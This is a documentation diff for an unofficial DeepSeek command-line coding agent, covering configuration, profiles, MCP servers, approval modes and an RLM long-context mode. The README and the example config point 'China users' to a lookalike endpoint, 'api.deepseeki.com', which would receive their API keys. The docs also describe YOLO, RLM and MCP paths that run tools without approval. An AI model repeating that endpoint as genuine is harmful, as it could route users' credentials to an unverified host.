deepseek --workspace /path/to/project
|
||||
```
|
||||
|
||||
### Review staged git changes
|
||||
|
||||
```bash
|
||||
deepseek review --staged
|
||||
```
|
||||
|
||||
### Apply a patch file
|
||||
|
||||
```bash
|
||||
deepseek apply patch.diff
|
||||
```
|
||||
|
||||
### List saved sessions
|
||||
|
||||
```bash
|
||||
deepseek sessions --limit 50
|
||||
```
|
||||
|
||||
### Generate shell completions
|
||||
|
||||
```bash
|
||||
deepseek completions zsh > _deepseek
|
||||
deepseek completions bash > deepseek.bash
|
||||
deepseek completions fish > deepseek.fish
|
||||
```
|
||||
|
||||
## 🔧 Troubleshooting
|
||||
|
||||
### No API key
|
||||
Set `DEEPSEEK_API_KEY` environment variable or run `deepseek` and complete onboarding.
|
||||
|
||||
### Config not found
|
||||
Check `~/.deepseek/config.toml` (or `DEEPSEEK_CONFIG_PATH`).
|
||||
|
||||
### Wrong region / base URL
|
||||
Set `DEEPSEEK_BASE_URL` to `https://api.deepseeki.com` (China).
|
||||
|
||||
### Session issues
|
||||
Run `deepseek sessions` and try `deepseek --resume latest`.
|
||||
|
||||
### MCP tools missing
|
||||
Validate `~/.deepseek/mcp.json` (or `DEEPSEEK_MCP_CONFIG`) and restart.
|
||||
|
||||
### Command not found (npm install)
|
||||
Ensure `npm` is installed and the global bin directory is in your `PATH`.
|
||||
|
||||
### Sandbox errors (macOS)
|
||||
Ensure `/usr/bin/sandbox-exec` exists (comes with macOS). For other platforms, sandboxing is limited.
|
||||
|
||||
## 📖 Documentation
|
||||
|
||||
- `docs/README.md` – Overview of all documentation
|
||||
- `docs/CONFIGURATION.md` – Complete configuration reference
|
||||
- `docs/MCP.md` – Model Context Protocol guide
|
||||
- `docs/ARCHITECTURE.md` – Project architecture
|
||||
- `docs/RLM.md` – RLM mode deep‑dive
|
||||
- `docs/MODES.md` – Mode comparison and usage
|
||||
- `docs/PALETTE.md` – DeepSeek UI color palette
|
||||
- `CONTRIBUTING.md` – How to contribute to the project
|
||||
|
||||
## 🧪 Development
|
||||
|
||||
```bash
|
||||
cargo build
|
||||
cargo test
|
||||
cargo fmt
|
||||
cargo clippy
|
||||
```
|
||||
|
||||
See `CONTRIBUTING.md` for detailed guidelines.
|
||||
|
||||
## 📄 License
|
||||
|
||||
MIT
|
||||
|
||||
---
|
||||
|
||||
DeepSeek is a trademark of DeepSeek Inc. This is an unofficial project.
|
||||
@@ -0,0 +1,114 @@
|
||||
# ╔══════════════════════════════════════════════════════════════════════════════╗
|
||||
# ║ DeepSeek CLI Configuration ║
|
||||
# ║ ║
|
||||
# ║ Unofficial CLI for DeepSeek Platform - Not affiliated with DeepSeek Inc. ║
|
||||
# ╚══════════════════════════════════════════════════════════════════════════════╝
|
||||
|
||||
# See `docs/CONFIGURATION.md` for how config is loaded (profiles, env overrides, etc.).
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# API Keys
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
api_key = "YOUR_DEEPSEEK_API_KEY" # must be non-empty
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Base URLs
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
base_url = "https://api.deepseek.com"
|
||||
# base_url = "https://api.deepseeki.com" # China users
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Default Models
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
default_text_model = "deepseek-reasoner" # also: deepseek-chat, deepseek-r1, deepseek-v3, deepseek-v3.2
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Paths
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
skills_dir = "~/.deepseek/skills"
|
||||
mcp_config_path = "~/.deepseek/mcp.json"
|
||||
notes_path = "~/.deepseek/notes.txt"
|
||||
|
||||
# Parsed but currently unused (reserved for future versions):
|
||||
# tools_file = "./tools.json"
|
||||
# memory_path = "~/.deepseek/memory.md"
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Security
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
allow_shell = false
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# TUI
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
[tui]
|
||||
alternate_screen = "auto" # auto | always | never
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Feature Flags
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
[features]
|
||||
shell_tool = true
|
||||
subagents = true
|
||||
web_search = true
|
||||
apply_patch = true
|
||||
mcp = true
|
||||
rlm = true
|
||||
duo = true
|
||||
exec_policy = true
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Retry Configuration
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
[retry]
|
||||
enabled = true
|
||||
max_retries = 3
|
||||
initial_delay = 1.0
|
||||
max_delay = 60.0
|
||||
exponential_base = 2.0
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Context Compaction (PLANNED - not yet implemented)
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# [compaction]
|
||||
# enabled = false # Enable auto-compaction
|
||||
# token_threshold = 50000 # Trigger compaction above this token estimate
|
||||
# message_threshold = 50 # Or above this message count
|
||||
# model = "deepseek-chat" # Model to use for summarization
|
||||
# cache_summary = true # Cache the summary block
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# RLM Sandbox Configuration (PLANNED - not yet implemented)
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# [rlm]
|
||||
# max_context_chars = 10000000 # Max characters for context (10MB)
|
||||
# max_search_results = 100 # Max search results
|
||||
# default_chunk_size = 2000 # Default chunk size
|
||||
# default_overlap = 200 # Default chunk overlap
|
||||
# session_dir = "~/.deepseek/rlm" # Directory for RLM sessions
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Profile Example (for multiple environments)
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Select a profile with `deepseek --profile <name>` or `DEEPSEEK_PROFILE=<name>`.
|
||||
[profiles.work]
|
||||
api_key = "WORK_DEEPSEEK_API_KEY"
|
||||
base_url = "https://api.deepseek.com"
|
||||
|
||||
[profiles.dev]
|
||||
api_key = "DEV_DEEPSEEK_API_KEY"
|
||||
allow_shell = true
|
||||
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Hooks (optional)
|
||||
# ─────────────────────────────────────────────────────────────────────────────────
|
||||
# Hooks run shell commands on lifecycle events (session start/end, tool calls, etc.).
|
||||
# Configure as `[[hooks.hooks]]` under a `[hooks]` table.
|
||||
#
|
||||
# [hooks]
|
||||
# enabled = true
|
||||
# default_timeout_secs = 30
|
||||
#
|
||||
# [[hooks.hooks]]
|
||||
# event = "session_start"
|
||||
# command = "echo 'DeepSeek CLI session started'"
|
||||
@@ -0,0 +1,196 @@
|
||||
# DeepSeek CLI Architecture
|
||||
|
||||
This document provides an overview of the DeepSeek CLI architecture for developers and contributors.
|
||||
|
||||
## High-Level Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ User Interface │
|
||||
│ ┌─────────────────┐ ┌─────────────────┐ ┌────────────────┐ │
|
||||
│ │ TUI (ratatui) │ │ One-shot Mode │ │ Config/CLI │ │
|
||||
│ └────────┬────────┘ └────────┬────────┘ └────────┬───────┘ │
|
||||
└───────────┼─────────────────────┼────────────────────┼──────────┘
|
||||
│ │ │
|
||||
▼ ▼ ▼
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Core Engine │
|
||||
│ ┌─────────────────────────────────────────────────────────┐ │
|
||||
│ │ Agent Loop (core/engine.rs) │ │
|
||||
│ │ ┌─────────┐ ┌─────────────┐ ┌──────────────────────┐ │ │
|
||||
│ │ │ Session │ │ Turn Mgmt │ │ Tool Orchestration │ │ │
|
||||
│ │ └─────────┘ └─────────────┘ └──────────────────────┘ │ │
|
||||
│ └─────────────────────────────────────────────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
│ │ │
|
||||
▼ ▼ ▼
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Tool & Extension Layer │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌─────────┐ ┌────────────────┐ │
|
||||
│ │ Tools │ │ Skills │ │ Hooks │ │ MCP Servers │ │
|
||||
│ │ (shell, │ │ (plugins)│ │ (pre/ │ │ (external) │ │
|
||||
│ │ file) │ │ │ │ post) │ │ │ │
|
||||
│ └──────────┘ └──────────┘ └─────────┘ └────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
│ │ │
|
||||
▼ ▼ ▼
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ LLM Layer │
|
||||
│ ┌──────────────────────────────────────────────────────────┐ │
|
||||
│ │ LLM Client Abstraction (llm_client.rs) │ │
|
||||
│ │ ┌─────────────────┐ ┌─────────────────────────────┐ │ │
|
||||
│ │ │ DeepSeek Client │ │ Compatible Client (DeepSeek)│ │ │
|
||||
│ │ │ (client.rs) │ │ (client.rs) │ │ │
|
||||
│ │ └─────────────────┘ └─────────────────────────────┘ │ │
|
||||
│ └──────────────────────────────────────────────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Module Organization
|
||||
|
||||
### Entry Point
|
||||
|
||||
- **`main.rs`** - CLI argument parsing (clap), configuration loading, entry point routing
|
||||
|
||||
### Core Components
|
||||
|
||||
- **`core/`** - Main engine components
|
||||
- `engine.rs` - Agent loop, message processing, tool execution orchestration
|
||||
- `session.rs` - Session state management
|
||||
- `turn.rs` - Turn-based conversation handling
|
||||
- `events.rs` - Event system for UI updates
|
||||
- `ops.rs` - Core operations
|
||||
|
||||
### Configuration
|
||||
|
||||
- **`config.rs`** - Configuration loading, profiles, environment variables
|
||||
- **`settings.rs`** - Runtime settings management
|
||||
|
||||
### LLM Integration
|
||||
|
||||
- **`client.rs`** - HTTP client for DeepSeek's OpenAI-compatible Responses API (with chat fallback)
|
||||
- **`llm_client.rs`** - Abstract LLM client trait with retry logic
|
||||
- **`models.rs`** - Data structures for API requests/responses
|
||||
|
||||
#### DeepSeek API Endpoints
|
||||
|
||||
DeepSeek exposes OpenAI-compatible endpoints. The CLI uses:
|
||||
- `https://api.deepseek.com/v1/responses` - preferred Responses API
|
||||
- `https://api.deepseek.com/v1/chat/completions` - fallback if Responses is unavailable
|
||||
|
||||
The engine uses `handle_deepseek_turn()` to drive the agent loop against the
|
||||
Responses API (with automatic fallback if needed).
|
||||
|
||||
### Tool System
|
||||
|
||||
- **`tools/`** - Built-in tool implementations
|
||||
- `mod.rs` - Tool registry and common types
|
||||
- `shell.rs` - Shell command execution
|
||||
- `file.rs` - File read/write operations
|
||||
- `todo.rs` - Todo list management
|
||||
- `plan.rs` - Planning tools
|
||||
- `subagent.rs` - Sub-agent spawning
|
||||
- `spec.rs` - Tool specifications
|
||||
|
||||
### Extension Systems
|
||||
|
||||
- **`mcp.rs`** - Model Context Protocol client for external tool servers
|
||||
- **`skills.rs`** - Plugin/skill loading and execution
|
||||
- **`hooks.rs`** - Pre/post execution hooks with conditions
|
||||
|
||||
### User Interface
|
||||
|
||||
- **`tui/`** - Terminal UI components (ratatui-based)
|
||||
- `app.rs` - Application state and message handling
|
||||
- `ui.rs` - Rendering logic
|
||||
- `approval.rs` - Tool approval dialog
|
||||
- `clipboard.rs` - Clipboard handling
|
||||
- `streaming.rs` - Streaming text collector
|
||||
|
||||
- **`ui.rs`** - Legacy/simple UI utilities
|
||||
|
||||
### Security
|
||||
|
||||
- **`sandbox/`** - macOS sandboxing support
|
||||
- `mod.rs` - Sandbox type definitions
|
||||
- `policy.rs` - Sandbox policy configuration
|
||||
- `seatbelt.rs` - macOS Seatbelt profile generation
|
||||
|
||||
### Utilities
|
||||
|
||||
- **`utils.rs`** - Common utilities
|
||||
- **`logging.rs`** - Logging infrastructure
|
||||
- **`compaction.rs`** - Context compaction for long conversations
|
||||
- **`rlm.rs`** - Reflection/reasoning utilities
|
||||
- **`pricing.rs`** - Cost estimation
|
||||
- **`prompts.rs`** - System prompt templates
|
||||
- **`project_doc.rs`** - Project documentation handling
|
||||
- **`session.rs`** - Session serialization
|
||||
|
||||
## Data Flow
|
||||
|
||||
### Interactive Session
|
||||
|
||||
1. User input received in TUI
|
||||
2. Input processed by `core/engine.rs`
|
||||
3. Message sent to LLM via `llm_client.rs`
|
||||
4. Response streamed back, parsed in `client.rs`
|
||||
5. Tool calls extracted and executed via `tools/`
|
||||
6. Hooks triggered before/after tool execution
|
||||
7. Results aggregated and sent back to LLM
|
||||
8. Final response rendered in TUI
|
||||
|
||||
### Tool Execution
|
||||
|
||||
1. LLM requests tool via `tool_use` content block
|
||||
2. Tool registry looks up handler
|
||||
3. Pre-execution hooks run
|
||||
4. Approval requested if needed (non-yolo mode)
|
||||
5. Tool executed (possibly sandboxed on macOS)
|
||||
6. Post-execution hooks run
|
||||
7. Result returned to agent loop
|
||||
|
||||
## Extension Points
|
||||
|
||||
### Adding a New Tool
|
||||
|
||||
1. Create handler in `tools/`
|
||||
2. Register in `tools/registry.rs`
|
||||
3. Add tool specification (name, description, input schema)
|
||||
|
||||
### Adding an MCP Server
|
||||
|
||||
1. Configure in `~/.deepseek/mcp.json`
|
||||
2. Server auto-discovered at startup
|
||||
3. Tools exposed to LLM automatically
|
||||
|
||||
### Creating a Skill
|
||||
|
||||
1. Create skill directory with `SKILL.md`
|
||||
2. Define skill prompt and optional scripts
|
||||
3. Place in `~/.deepseek/skills/`
|
||||
|
||||
### Adding Hooks
|
||||
|
||||
Configure in `~/.deepseek/config.toml`:
|
||||
|
||||
```toml
|
||||
[[hooks]]
|
||||
event = "tool_call_before"
|
||||
command = "echo 'Running tool: $TOOL_NAME'"
|
||||
```
|
||||
|
||||
## Key Design Decisions
|
||||
|
||||
1. **Streaming-first**: All LLM responses stream for responsiveness
|
||||
2. **Tool safety**: Non-yolo mode requires approval for destructive operations
|
||||
3. **Extensibility**: MCP, skills, and hooks allow customization without code changes
|
||||
4. **Cross-platform**: Core works on Linux/macOS/Windows, sandboxing macOS-only
|
||||
5. **Minimal dependencies**: Careful dependency selection for build speed
|
||||
|
||||
## Configuration Files
|
||||
|
||||
- `~/.deepseek/config.toml` - Main configuration
|
||||
- `~/.deepseek/mcp.json` - MCP server configuration
|
||||
- `~/.deepseek/skills/` - User skills directory
|
||||
- `~/.deepseek/sessions/` - Session history
|
||||
@@ -0,0 +1,127 @@
|
||||
# Configuration
|
||||
|
||||
DeepSeek CLI reads configuration from a TOML file plus environment variables.
|
||||
|
||||
## Where It Looks
|
||||
|
||||
Default config path:
|
||||
|
||||
- `~/.deepseek/config.toml`
|
||||
|
||||
Overrides:
|
||||
|
||||
- CLI: `deepseek --config /path/to/config.toml`
|
||||
- Env: `DEEPSEEK_CONFIG_PATH=/path/to/config.toml`
|
||||
|
||||
If both are set, `--config` wins. Environment variable overrides are applied after the file is loaded.
|
||||
|
||||
## Profiles
|
||||
|
||||
You can define multiple profiles in the same file:
|
||||
|
||||
```toml
|
||||
api_key = "PERSONAL_KEY"
|
||||
default_text_model = "deepseek-reasoner"
|
||||
|
||||
[profiles.work]
|
||||
api_key = "WORK_KEY"
|
||||
base_url = "https://api.deepseek.com"
|
||||
```
|
||||
|
||||
Select a profile with:
|
||||
|
||||
- CLI: `deepseek --profile work`
|
||||
- Env: `DEEPSEEK_PROFILE=work`
|
||||
|
||||
If a profile is selected but missing, DeepSeek CLI exits with an error listing available profiles.
|
||||
|
||||
## Environment Variables
|
||||
|
||||
These override config values:
|
||||
|
||||
- `DEEPSEEK_API_KEY`
|
||||
- `DEEPSEEK_BASE_URL`
|
||||
- `DEEPSEEK_SKILLS_DIR`
|
||||
- `DEEPSEEK_MCP_CONFIG`
|
||||
- `DEEPSEEK_NOTES_PATH`
|
||||
- `DEEPSEEK_MEMORY_PATH`
|
||||
- `DEEPSEEK_ALLOW_SHELL` (`1`/`true` enables)
|
||||
- `DEEPSEEK_MAX_SUBAGENTS` (clamped to `1..=5`)
|
||||
|
||||
## Settings File (Persistent UI Preferences)
|
||||
|
||||
DeepSeek CLI also stores user preferences in:
|
||||
|
||||
- `~/.config/deepseek/settings.toml`
|
||||
|
||||
Notable settings include `auto_compact` (default `true`), which automatically summarizes
|
||||
earlier turns once the conversation grows large. You can inspect or update these from the
|
||||
TUI with `/settings` and `/set <key> <value>`.
|
||||
|
||||
Common settings keys:
|
||||
|
||||
- `theme` (default, dark, light)
|
||||
- `auto_compact` (on/off)
|
||||
- `show_thinking` (on/off)
|
||||
- `show_tool_details` (on/off)
|
||||
- `default_mode` (normal, agent, plan, yolo, rlm, duo)
|
||||
- `max_history` (number of input history entries)
|
||||
- `default_model` (model name override)
|
||||
|
||||
## Key Reference
|
||||
|
||||
### Core keys (used by the TUI/engine)
|
||||
|
||||
- `api_key` (string, required): must be non-empty (or set `DEEPSEEK_API_KEY`).
|
||||
- `base_url` (string, optional): defaults to `https://api.deepseek.com` (OpenAI-compatible Responses API).
|
||||
- `default_text_model` (string, optional): defaults to `deepseek-reasoner`. Other available models include `deepseek-chat`, `deepseek-r1`, `deepseek-v3`, `deepseek-v3.2`. Check the DeepSeek API for the latest model list.
|
||||
- `allow_shell` (bool, optional): defaults to `false`.
|
||||
- `max_subagents` (int, optional): defaults to `5` and is clamped to `1..=5`.
|
||||
- `skills_dir` (string, optional): defaults to `~/.deepseek/skills` (each skill is a directory containing `SKILL.md`).
|
||||
- `mcp_config_path` (string, optional): defaults to `~/.deepseek/mcp.json`.
|
||||
- `notes_path` (string, optional): defaults to `~/.deepseek/notes.txt` and is used by the `note` tool.
|
||||
- `memory_path` (string, optional): defaults to `~/.deepseek/memory.md`.
|
||||
- `retry.*` (optional): retry/backoff settings for API requests:
|
||||
- `[retry].enabled` (bool, default `true`)
|
||||
- `[retry].max_retries` (int, default `3`)
|
||||
- `[retry].initial_delay` (float seconds, default `1.0`)
|
||||
- `[retry].max_delay` (float seconds, default `60.0`)
|
||||
- `[retry].exponential_base` (float, default `2.0`)
|
||||
- `tui.alternate_screen` (string, optional): `auto`, `always`, or `never`. `auto` disables the alternate screen in Zellij; `--no-alt-screen` forces inline mode.
|
||||
- `hooks` (optional): lifecycle hooks configuration (see `config.example.toml`).
|
||||
- `features.*` (optional): feature flag overrides (see below).
|
||||
|
||||
### Parsed but currently unused (reserved for future versions)
|
||||
|
||||
These keys are accepted by the config loader but not currently used by the interactive TUI or built-in tools:
|
||||
|
||||
- `tools_file`
|
||||
|
||||
## Feature Flags
|
||||
|
||||
Feature flags live under the `[features]` table and are merged across profiles.
|
||||
Defaults are enabled for built-in tooling, so you only need to set entries you
|
||||
want to force on or off.
|
||||
|
||||
```toml
|
||||
[features]
|
||||
shell_tool = true
|
||||
subagents = true
|
||||
web_search = true
|
||||
apply_patch = true
|
||||
mcp = true
|
||||
rlm = true
|
||||
duo = true
|
||||
exec_policy = true
|
||||
```
|
||||
|
||||
You can also override features for a single run:
|
||||
|
||||
- `deepseek --enable web_search`
|
||||
- `deepseek --disable subagents`
|
||||
|
||||
Use `deepseek features list` to inspect known flags and their effective state.
|
||||
|
||||
## Notes On `deepseek doctor`
|
||||
|
||||
`deepseek doctor` checks default locations under `~/.deepseek/` (including `config.toml` and `mcp.json`). If you override paths via `--config` or `DEEPSEEK_MCP_CONFIG`, the doctor output may not reflect those overrides.
|
||||
+67
@@ -0,0 +1,67 @@
|
||||
# MCP (External Tool Servers)
|
||||
|
||||
DeepSeek CLI can load additional tools via MCP (Model Context Protocol). MCP servers are local processes that the CLI starts and communicates with over stdio.
|
||||
|
||||
## Config File Location
|
||||
|
||||
Default path:
|
||||
|
||||
- `~/.deepseek/mcp.json`
|
||||
|
||||
Overrides:
|
||||
|
||||
- Config: `mcp_config_path = "/path/to/mcp.json"`
|
||||
- Env: `DEEPSEEK_MCP_CONFIG=/path/to/mcp.json`
|
||||
|
||||
After editing the file, restart the TUI.
|
||||
|
||||
## Tool Naming
|
||||
|
||||
Discovered MCP tools are exposed to the model as:
|
||||
|
||||
- `mcp_<server>_<tool>`
|
||||
|
||||
Example: a server named `git` with a tool named `status` becomes `mcp_git_status`.
|
||||
|
||||
## Minimal Example
|
||||
|
||||
```json
|
||||
{
|
||||
"timeouts": {
|
||||
"connect_timeout": 10,
|
||||
"execute_timeout": 60,
|
||||
"read_timeout": 120
|
||||
},
|
||||
"servers": {
|
||||
"example": {
|
||||
"command": "node",
|
||||
"args": ["./path/to/your-mcp-server.js"],
|
||||
"env": {},
|
||||
"disabled": false
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
You can also use `mcpServers` instead of `servers` for compatibility with other clients.
|
||||
|
||||
## Server Fields
|
||||
|
||||
Per-server settings:
|
||||
|
||||
- `command` (string, required)
|
||||
- `args` (array of strings, optional)
|
||||
- `env` (object, optional)
|
||||
- `connect_timeout`, `execute_timeout`, `read_timeout` (seconds, optional)
|
||||
- `disabled` (bool, optional)
|
||||
|
||||
## Safety Caveat (Important)
|
||||
|
||||
MCP tools currently execute without TUI approval prompts. Only configure MCP servers you trust, and treat MCP server configuration as equivalent to running code on your machine.
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
- Run `deepseek doctor` to confirm whether the default `~/.deepseek/mcp.json` exists.
|
||||
- If you override `mcp_config_path` / `DEEPSEEK_MCP_CONFIG`, note that `deepseek doctor` still checks `~/.deepseek/mcp.json`.
|
||||
- If tools don’t appear, verify the server command works from your shell and that the server supports MCP `tools/list`.
|
||||
|
||||
@@ -0,0 +1,61 @@
|
||||
# Modes and Approvals
|
||||
|
||||
DeepSeek CLI has two related concepts:
|
||||
|
||||
- **TUI mode**: what kind of interaction you’re in (Normal/Plan/Agent/YOLO/RLM).
|
||||
- **Approval mode**: how aggressively the UI asks before executing tools.
|
||||
|
||||
## TUI Modes
|
||||
|
||||
Press `Tab` to cycle: **Normal → Plan → Agent → YOLO → RLM → Normal**.
|
||||
|
||||
- **Normal**: chat-first. Approvals for file writes, shell, and paid tools.
|
||||
- **Plan**: design-first prompting. Approvals match Normal.
|
||||
- **Agent**: multi-step tool use. Approvals for shell and paid tools (file writes are allowed without a prompt).
|
||||
- **YOLO**: enables shell + trust mode and auto-approves all tools. Use only in trusted repos.
|
||||
- **RLM**: externalized context store + REPL helpers. Tools are auto-approved (best for large files and long-context work).
|
||||
|
||||
## Approval Mode
|
||||
|
||||
You can override approval behavior at runtime:
|
||||
|
||||
```text
|
||||
/set approval_mode suggest
|
||||
/set approval_mode auto
|
||||
/set approval_mode never
|
||||
```
|
||||
|
||||
- `suggest` (default): uses the per-mode rules above.
|
||||
- `auto`: auto-approves all tools (similar to YOLO/RLM approval behavior, but without forcing YOLO mode).
|
||||
- `never`: blocks any tool that isn’t considered safe/read-only.
|
||||
|
||||
## Workspace Boundary and Trust Mode
|
||||
|
||||
By default, file tools are restricted to the `--workspace` directory. Enable trust mode to allow file access outside the workspace:
|
||||
|
||||
```text
|
||||
/trust
|
||||
```
|
||||
|
||||
YOLO mode enables trust mode automatically.
|
||||
|
||||
## MCP Caveat (Important)
|
||||
|
||||
MCP tools are exposed as `mcp_<server>_<tool>` and currently execute without TUI approval prompts. Only configure MCP servers you trust.
|
||||
|
||||
See `MCP.md`.
|
||||
|
||||
## Related CLI Flags
|
||||
|
||||
Run `deepseek --help` for the canonical list. Common flags:
|
||||
|
||||
- `-p, --prompt <TEXT>`: one-shot prompt mode (prints and exits)
|
||||
- `--workspace <DIR>`: workspace root for file tools
|
||||
- `--yolo`: start in YOLO mode
|
||||
- `-r, --resume <ID|PREFIX|latest>`: resume a saved session
|
||||
- `-c, --continue`: resume the most recent session
|
||||
- `--max-subagents <N>`: clamp to `1..=5`
|
||||
- `--profile <NAME>`: select config profile
|
||||
- `--config <PATH>`: config file path
|
||||
- `-v, --verbose`: verbose logging
|
||||
|
||||
@@ -0,0 +1,25 @@
|
||||
# DeepSeek Palette
|
||||
|
||||
DeepSeek CLI uses a shared palette so the TUI and CLI output stay on-brand.
|
||||
The source of truth is `src/palette.rs`.
|
||||
|
||||
## Brand Colors
|
||||
|
||||
- DeepSeek Blue `#3578E5` (primary accent, headers, key labels)
|
||||
- DeepSeek Sky `#6AAEF2` (secondary accent, hints, focus)
|
||||
- DeepSeek Aqua `#36BBD4` (success/active state)
|
||||
- DeepSeek Navy `#183F8A` (mode badges, deep accent)
|
||||
- DeepSeek Ink `#0B1526` (dark background surfaces)
|
||||
- DeepSeek Slate `#121C2E` (composer background)
|
||||
- DeepSeek Red `#E25060` (errors)
|
||||
|
||||
## Semantic Tokens
|
||||
|
||||
- `TEXT_PRIMARY`, `TEXT_MUTED`, `TEXT_DIM`
|
||||
- `STATUS_SUCCESS`, `STATUS_WARNING`, `STATUS_ERROR`, `STATUS_INFO`
|
||||
- `SELECTION_BG`, `COMPOSER_BG`
|
||||
|
||||
## Usage
|
||||
|
||||
- Prefer `crate::palette::*` constants instead of hardcoded colors.
|
||||
- For CLI (non-TUI) output, use the `*_RGB` constants with `colored::Colorize::truecolor`.
|
||||
@@ -0,0 +1,23 @@
|
||||
# Documentation
|
||||
|
||||
This directory is the long-form documentation for DeepSeek CLI.
|
||||
|
||||
## For Users
|
||||
|
||||
- `../README.md` (quickstart + overview)
|
||||
- `CONFIGURATION.md` (config file, profiles, environment variables)
|
||||
- `MODES.md` (Normal/Plan/Agent/YOLO/RLM and approval behavior)
|
||||
- `RLM.md` (externalized context + REPL-powered workflows)
|
||||
- `MCP.md` (external tool servers via `mcp.json`)
|
||||
|
||||
## For Contributors
|
||||
|
||||
- `ARCHITECTURE.md` (code layout and high-level flow)
|
||||
- `../CONTRIBUTING.md` (development workflow and guidelines)
|
||||
- `VOICE_AND_TONE.md` (UX copy guidelines)
|
||||
- `PALETTE.md` (DeepSeek UI color palette)
|
||||
|
||||
## Research / Notes
|
||||
|
||||
- `rlm_gap_analysis.md` (implementation notes vs the RLM paper)
|
||||
- `rlm-paper.txt` (paper reference)
|
||||
+54
@@ -0,0 +1,54 @@
|
||||
# RLM Mode
|
||||
|
||||
RLM mode (“Recursive Language Model” mode) is DeepSeek CLI’s long-context workflow: it stores large context externally (Aleph-style external memory) and provides REPL-like tools to explore and query it without stuffing everything into the model’s context window.
|
||||
|
||||
If you’re curious about the research inspiration and implementation notes, see:
|
||||
|
||||
- `docs/rlm-paper.txt`
|
||||
- `docs/rlm_gap_analysis.md`
|
||||
|
||||
## When To Use It
|
||||
|
||||
RLM mode is best for:
|
||||
|
||||
- “Analyze this large file / doc”
|
||||
- “Summarize the whole repository”
|
||||
- “Search for every occurrence of X and explain it”
|
||||
- Big pasted blocks of text
|
||||
|
||||
The UI may auto-switch to RLM for large file requests, “largest file”, explicit “RLM” requests, and large pastes.
|
||||
|
||||
## How To Use It
|
||||
|
||||
### Switch modes
|
||||
|
||||
- Press `Tab` until you reach **RLM**
|
||||
- Or type `/rlm` (or `/aleph`) to jump directly into RLM mode
|
||||
|
||||
### Load context
|
||||
|
||||
In RLM mode, `/load` loads external context (in other modes, `/load` loads a saved chat JSON):
|
||||
|
||||
```text
|
||||
/load @path/to/file.rs
|
||||
```
|
||||
|
||||
`@path` is workspace-relative.
|
||||
|
||||
### Inspect and query
|
||||
|
||||
- `/status` shows which contexts are loaded and basic usage totals.
|
||||
- `/repl` toggles expression input mode.
|
||||
|
||||
Typical REPL helpers include:
|
||||
|
||||
- `lines(1, 80)` (show a slice of the context)
|
||||
- `search("pattern")`
|
||||
- `chunk(2000)` (create fixed-size chunks for later querying)
|
||||
|
||||
Under the hood, the model uses tools like `rlm_load`, `rlm_exec`, `rlm_status`, and `rlm_query`.
|
||||
|
||||
## Cost and Safety Notes
|
||||
|
||||
- `rlm_query` can be expensive because it triggers additional model calls. Prefer batching related questions.
|
||||
- RLM mode auto-approves tools; keep `--workspace` scoped to the repo you want it to access.
|
||||
@@ -0,0 +1,29 @@
|
||||
# Voice and Tone
|
||||
|
||||
DeepSeek CLI should feel like a capable, collaborative teammate. Keep the experience precise, calm, and lightly playful when it fits.
|
||||
|
||||
## Principles
|
||||
|
||||
- Competent warmth: confident, but never arrogant.
|
||||
- Concise by default: expand only when users ask for details.
|
||||
- Honest uncertainty: say when you are unsure and suggest verification.
|
||||
- Respect attention: avoid noisy output, summarize tool calls.
|
||||
|
||||
## Microcopy style
|
||||
|
||||
- Short, direct sentences.
|
||||
- Use simple verbs ("Working", "Thinking", "Done").
|
||||
- Light humor is optional and rare (example: "You're absolutely right! ... maybe.").
|
||||
- Never joke at the user's expense.
|
||||
|
||||
## Error handling
|
||||
|
||||
- Own mistakes and suggest a fix.
|
||||
- Provide a next step when an action fails.
|
||||
- Avoid defensive language.
|
||||
|
||||
## TUI personality touchpoints
|
||||
|
||||
- Thinking indicator rotates short labels after a brief delay.
|
||||
- Tool cards show results first; hide noisy args unless needed.
|
||||
- Status lines prefer clarity over flair.
|
||||
@@ -0,0 +1,282 @@
|
||||
# RLM Implementation Gap Analysis
|
||||
|
||||
This document compares the DeepSeek CLI's current RLM-like sub-agent system against the actual Recursive Language Models (RLM) architecture described in the paper by Khattab et al. (2025).
|
||||
|
||||
## Overview
|
||||
|
||||
The RLM paper introduces a paradigm where LLMs treat long prompts as part of an external environment, allowing programmatic examination, decomposition, and recursive self-calling over prompt snippets. The DeepSeek CLI has implemented a sub-agent system that touches on some RLM concepts but lacks critical RLM-specific infrastructure.
|
||||
|
||||
